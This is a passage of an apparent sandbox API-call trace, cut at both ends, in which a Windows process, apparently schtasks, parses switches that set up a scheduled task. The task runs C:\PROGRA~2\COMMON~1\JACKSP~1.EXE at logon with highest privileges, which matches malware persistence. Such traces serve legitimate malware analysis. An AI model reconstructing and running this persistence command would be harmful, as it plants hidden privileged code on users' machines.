_Buffer="|xml|") returned 5 [0028.313] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.313] lstrlenW (lpString="|xml|") returned 5 [0028.313] lstrlenW (lpString="|rl|") returned 4 [0028.313] StrStrIW (lpFirst="|xml|", lpSrch="|rl|") returned 0x0 [0028.313] SetLastError (dwErrCode=0x490) [0028.313] lstrlenW (lpString="ec") returned 2 [0028.313] lstrlenW (lpString="ec") returned 2 [0028.313] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.313] lstrlenW (lpString="rl") returned 2 [0028.313] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.313] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|ec|") returned 4 [0028.313] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.314] lstrlenW (lpString="|ec|") returned 4 [0028.314] lstrlenW (lpString="|rl|") returned 4 [0028.314] StrStrIW (lpFirst="|ec|", lpSrch="|rl|") returned 0x0 [0028.314] SetLastError (dwErrCode=0x490) [0028.314] lstrlenW (lpString="rl") returned 2 [0028.314] lstrlenW (lpString="rl") returned 2 [0028.314] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.314] lstrlenW (lpString="rl") returned 2 [0028.314] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.314] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.314] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rl|") returned 4 [0028.314] lstrlenW (lpString="|rl|") returned 4 [0028.314] lstrlenW (lpString="|rl|") returned 4 [0028.314] StrStrIW (lpFirst="|rl|", lpSrch="|rl|") returned="|rl|" [0028.314] SetLastError (dwErrCode=0x0) [0028.314] SetLastError (dwErrCode=0x0) [0028.314] lstrlenW (lpString="highest") returned 7 [0028.314] lstrlenW (lpString="-/") returned 2 [0028.314] StrChrIW (lpStart="-/", wMatch=0x68) returned 0x0 [0028.314] SetLastError (dwErrCode=0x490) [0028.314] SetLastError (dwErrCode=0x490) [0028.314] SetLastError (dwErrCode=0x0) [0028.314] lstrlenW (lpString="highest") returned 7 [0028.314] StrChrIW (lpStart="highest", wMatch=0x3a) returned 0x0 [0028.314] SetLastError (dwErrCode=0x490) [0028.314] SetLastError (dwErrCode=0x0) [0028.314] _memicmp (_Buf1=0x364d78, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.314] lstrlenW (lpString="highest") returned 7 [0028.314] lstrlenW (lpString="highest") returned 7 [0028.314] lstrlenW (lpString=" \x09") returned 2 [0028.314] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0028.314] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0028.314] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0028.314] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0028.314] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0028.314] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0028.314] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0028.315] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0028.315] GetLastError () returned 0x0 [0028.315] lstrlenW (lpString="highest") returned 7 [0028.315] lstrlenW (lpString="highest") returned 7 [0028.315] SetLastError (dwErrCode=0x0) [0028.315] SetLastError (dwErrCode=0x0) [0028.315] lstrlenW (lpString="/tr") returned 3 [0028.315] lstrlenW (lpString="-/") returned 2 [0028.315] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0028.315] lstrlenW (lpString="create") returned 6 [0028.315] lstrlenW (lpString="create") returned 6 [0028.315] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.315] lstrlenW (lpString="tr") returned 2 [0028.315] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.315] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|create|") returned 8 [0028.315] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.315] lstrlenW (lpString="|create|") returned 8 [0028.315] lstrlenW (lpString="|tr|") returned 4 [0028.315] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0028.315] SetLastError (dwErrCode=0x490) [0028.315] lstrlenW (lpString="?") returned 1 [0028.315] lstrlenW (lpString="?") returned 1 [0028.315] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.315] lstrlenW (lpString="tr") returned 2 [0028.315] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.315] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|?|") returned 3 [0028.315] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.315] lstrlenW (lpString="|?|") returned 3 [0028.315] lstrlenW (lpString="|tr|") returned 4 [0028.315] SetLastError (dwErrCode=0x490) [0028.315] lstrlenW (lpString="s") returned 1 [0028.315] lstrlenW (lpString="s") returned 1 [0028.315] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.315] lstrlenW (lpString="tr") returned 2 [0028.315] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.315] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|s|") returned 3 [0028.316] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.316] lstrlenW (lpString="|s|") returned 3 [0028.316] lstrlenW (lpString="|tr|") returned 4 [0028.316] SetLastError (dwErrCode=0x490) [0028.316] lstrlenW (lpString="u") returned 1 [0028.316] lstrlenW (lpString="u") returned 1 [0028.316] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.316] lstrlenW (lpString="tr") returned 2 [0028.316] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.316] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|u|") returned 3 [0028.316] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.316] lstrlenW (lpString="|u|") returned 3 [0028.316] lstrlenW (lpString="|tr|") returned 4 [0028.316] SetLastError (dwErrCode=0x490) [0028.316] lstrlenW (lpString="p") returned 1 [0028.316] lstrlenW (lpString="p") returned 1 [0028.316] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.316] lstrlenW (lpString="tr") returned 2 [0028.316] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.316] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|p|") returned 3 [0028.316] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.316] lstrlenW (lpString="|p|") returned 3 [0028.316] lstrlenW (lpString="|tr|") returned 4 [0028.316] SetLastError (dwErrCode=0x490) [0028.316] lstrlenW (lpString="ru") returned 2 [0028.316] lstrlenW (lpString="ru") returned 2 [0028.316] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.316] lstrlenW (lpString="tr") returned 2 [0028.316] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.316] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|ru|") returned 4 [0028.316] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.316] lstrlenW (lpString="|ru|") returned 4 [0028.316] lstrlenW (lpString="|tr|") returned 4 [0028.316] StrStrIW (lpFirst="|ru|", lpSrch="|tr|") returned 0x0 [0028.316] SetLastError (dwErrCode=0x490) [0028.317] lstrlenW (lpString="rp") returned 2 [0028.317] lstrlenW (lpString="rp") returned 2 [0028.317] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.317] lstrlenW (lpString="tr") returned 2 [0028.317] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.317] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rp|") returned 4 [0028.317] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.317] lstrlenW (lpString="|rp|") returned 4 [0028.317] lstrlenW (lpString="|tr|") returned 4 [0028.317] StrStrIW (lpFirst="|rp|", lpSrch="|tr|") returned 0x0 [0028.317] SetLastError (dwErrCode=0x490) [0028.317] lstrlenW (lpString="sc") returned 2 [0028.317] lstrlenW (lpString="sc") returned 2 [0028.317] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.317] lstrlenW (lpString="tr") returned 2 [0028.317] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.317] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|sc|") returned 4 [0028.317] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.317] lstrlenW (lpString="|sc|") returned 4 [0028.317] lstrlenW (lpString="|tr|") returned 4 [0028.317] StrStrIW (lpFirst="|sc|", lpSrch="|tr|") returned 0x0 [0028.317] SetLastError (dwErrCode=0x490) [0028.317] lstrlenW (lpString="mo") returned 2 [0028.317] lstrlenW (lpString="mo") returned 2 [0028.317] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.317] lstrlenW (lpString="tr") returned 2 [0028.317] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.317] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|mo|") returned 4 [0028.317] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.317] lstrlenW (lpString="|mo|") returned 4 [0028.317] lstrlenW (lpString="|tr|") returned 4 [0028.317] StrStrIW (lpFirst="|mo|", lpSrch="|tr|") returned 0x0 [0028.317] SetLastError (dwErrCode=0x490) [0028.317] lstrlenW (lpString="d") returned 1 [0028.317] lstrlenW (lpString="d") returned 1 [0028.318] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.318] lstrlenW (lpString="tr") returned 2 [0028.318] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.318] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|d|") returned 3 [0028.318] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.318] lstrlenW (lpString="|d|") returned 3 [0028.318] lstrlenW (lpString="|tr|") returned 4 [0028.318] SetLastError (dwErrCode=0x490) [0028.318] lstrlenW (lpString="m") returned 1 [0028.318] lstrlenW (lpString="m") returned 1 [0028.318] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.318] lstrlenW (lpString="tr") returned 2 [0028.318] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.318] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|m|") returned 3 [0028.318] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.318] lstrlenW (lpString="|m|") returned 3 [0028.318] lstrlenW (lpString="|tr|") returned 4 [0028.318] SetLastError (dwErrCode=0x490) [0028.318] lstrlenW (lpString="i") returned 1 [0028.318] lstrlenW (lpString="i") returned 1 [0028.318] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.318] lstrlenW (lpString="tr") returned 2 [0028.318] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.318] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|i|") returned 3 [0028.318] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.318] lstrlenW (lpString="|i|") returned 3 [0028.318] lstrlenW (lpString="|tr|") returned 4 [0028.318] SetLastError (dwErrCode=0x490) [0028.318] lstrlenW (lpString="tn") returned 2 [0028.318] lstrlenW (lpString="tn") returned 2 [0028.318] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.318] lstrlenW (lpString="tr") returned 2 [0028.318] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.318] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.319] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.319] lstrlenW (lpString="|tn|") returned 4 [0028.319] lstrlenW (lpString="|tr|") returned 4 [0028.319] StrStrIW (lpFirst="|tn|", lpSrch="|tr|") returned 0x0 [0028.319] SetLastError (dwErrCode=0x490) [0028.319] lstrlenW (lpString="tr") returned 2 [0028.319] lstrlenW (lpString="tr") returned 2 [0028.319] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.319] lstrlenW (lpString="tr") returned 2 [0028.319] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.319] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.319] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tr|") returned 4 [0028.319] lstrlenW (lpString="|tr|") returned 4 [0028.319] lstrlenW (lpString="|tr|") returned 4 [0028.319] StrStrIW (lpFirst="|tr|", lpSrch="|tr|") returned="|tr|" [0028.319] SetLastError (dwErrCode=0x0) [0028.319] SetLastError (dwErrCode=0x0) [0028.319] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.319] lstrlenW (lpString="-/") returned 2 [0028.319] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0028.319] SetLastError (dwErrCode=0x490) [0028.319] SetLastError (dwErrCode=0x490) [0028.319] SetLastError (dwErrCode=0x0) [0028.319] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.319] StrChrIW (lpStart="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE", wMatch=0x3a) returned=":\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" [0028.319] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.319] _memicmp (_Buf1=0x364d90, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.319] _memicmp (_Buf1=0x364dc0, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.319] SetLastError (dwErrCode=0x7a) [0028.319] SetLastError (dwErrCode=0x0) [0028.319] SetLastError (dwErrCode=0x0) [0028.319] lstrlenW (lpString="C") returned 1 [0028.319] SetLastError (dwErrCode=0x490) [0028.319] SetLastError (dwErrCode=0x0) [0028.319] _memicmp (_Buf1=0x364d78, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.320] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.320] GetProcessHeap () returned 0x350000 [0028.320] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364d48) returned 1 [0028.320] GetProcessHeap () returned 0x350000 [0028.320] RtlReAllocateHeap (Heap=0x350000, Flags=0xc, Ptr=0x364d48, Size=0x44) returned 0x366a48 [0028.320] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.320] lstrlenW (lpString=" \x09") returned 2 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x7e) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x32) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0028.320] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x7e) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x4a) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x7e) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x58) returned 0x0 [0028.322] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0028.323] GetLastError () returned 0x0 [0028.323] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.323] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.323] SetLastError (dwErrCode=0x0) [0028.323] GetProcessHeap () returned 0x350000 [0028.323] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365458 [0028.323] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.323] LoadStringW (in: hInstance=0x0, uID=0x20d, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="LIMITED") returned 0x7 [0028.323] lstrlenW (lpString="LIMITED") returned 7 [0028.323] GetProcessHeap () returned 0x350000 [0028.323] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364d48 [0028.323] GetThreadLocale () returned 0x409 [0028.323] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="highest", cchCount1=-1, lpString2="LIMITED", cchCount2=-1) returned 1 [0028.323] GetProcessHeap () returned 0x350000 [0028.323] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365438 [0028.323] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.323] LoadStringW (in: hInstance=0x0, uID=0x20e, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="HIGHEST") returned 0x7 [0028.323] lstrlenW (lpString="HIGHEST") returned 7 [0028.323] GetProcessHeap () returned 0x350000 [0028.323] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364dd8 [0028.323] GetThreadLocale () returned 0x409 [0028.323] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="highest", cchCount1=-1, lpString2="HIGHEST", cchCount2=-1) returned 2 [0028.323] GetProcessHeap () returned 0x350000 [0028.323] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365418 [0028.323] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.323] LoadStringW (in: hInstance=0x0, uID=0x1ae, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="MINUTE") returned 0x6 [0028.323] lstrlenW (lpString="MINUTE") returned 6 [0028.323] GetProcessHeap () returned 0x350000 [0028.323] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0xe) returned 0x364df0 [0028.323] GetThreadLocale () returned 0x409 [0028.323] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="MINUTE", cchCount2=-1) returned 3 [0028.323] GetProcessHeap () returned 0x350000 [0028.324] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3653f8 [0028.324] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.324] LoadStringW (in: hInstance=0x0, uID=0x1af, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="HOURLY") returned 0x6 [0028.324] lstrlenW (lpString="HOURLY") returned 6 [0028.324] GetProcessHeap () returned 0x350000 [0028.324] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0xe) returned 0x364e08 [0028.324] GetThreadLocale () returned 0x409 [0028.324] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="HOURLY", cchCount2=-1) returned 3 [0028.324] GetProcessHeap () returned 0x350000 [0028.324] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3653d8 [0028.324] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.324] LoadStringW (in: hInstance=0x0, uID=0x1b0, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="DAILY") returned 0x5 [0028.324] lstrlenW (lpString="DAILY") returned 5 [0028.324] GetProcessHeap () returned 0x350000 [0028.324] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0xc) returned 0x364e20 [0028.324] GetThreadLocale () returned 0x409 [0028.324] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="DAILY", cchCount2=-1) returned 3 [0028.324] GetProcessHeap () returned 0x350000 [0028.324] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365398 [0028.324] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.324] LoadStringW (in: hInstance=0x0, uID=0x1b1, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="WEEKLY") returned 0x6 [0028.324] lstrlenW (lpString="WEEKLY") returned 6 [0028.324] GetProcessHeap () returned 0x350000 [0028.324] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0xe) returned 0x364e38 [0028.324] GetThreadLocale () returned 0x409 [0028.324] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="WEEKLY", cchCount2=-1) returned 1 [0028.324] GetProcessHeap () returned 0x350000 [0028.324] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3654d8 [0028.324] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.324] LoadStringW (in: hInstance=0x0, uID=0x1b2, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="MONTHLY") returned 0x7 [0028.324] lstrlenW (lpString="MONTHLY") returned 7 [0028.324] GetProcessHeap () returned 0x350000 [0028.324] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364e50 [0028.324] GetThreadLocale () returned 0x409 [0028.324] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="MONTHLY", cchCount2=-1) returned 3 [0028.324] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.324] LoadStringW (in: hInstance=0x0, uID=0x1b3, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="ONCE") returned 0x4 [0028.325] lstrlenW (lpString="ONCE") returned 4 [0028.325] GetProcessHeap () returned 0x350000 [0028.325] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0xa) returned 0x364e68 [0028.325] GetThreadLocale () returned 0x409 [0028.325] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="ONCE", cchCount2=-1) returned 3 [0028.325] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.325] LoadStringW (in: hInstance=0x0, uID=0x1b4, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="ONSTART") returned 0x7 [0028.325] lstrlenW (lpString="ONSTART") returned 7 [0028.325] GetThreadLocale () returned 0x409 [0028.325] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="ONSTART", cchCount2=-1) returned 1 [0028.325] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.325] LoadStringW (in: hInstance=0x0, uID=0x1b5, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="ONLOGON") returned 0x7 [0028.325] lstrlenW (lpString="ONLOGON") returned 7 [0028.325] GetThreadLocale () returned 0x409 [0028.325] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="ONLOGON", cchCount2=-1) returned 2 [0028.325] SetLastError (dwErrCode=0x0) [0028.325] GetProcessHeap () returned 0x350000 [0028.325] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x1fc) returned 0x366a98 [0028.325] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.325] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0028.325] lstrlenW (lpString="First") returned 5 [0028.325] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.325] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0028.325] lstrlenW (lpString="Second") returned 6 [0028.325] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.325] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0028.325] lstrlenW (lpString="Third") returned 5 [0028.325] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.325] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x366778, cchBufferMax=256 | out: 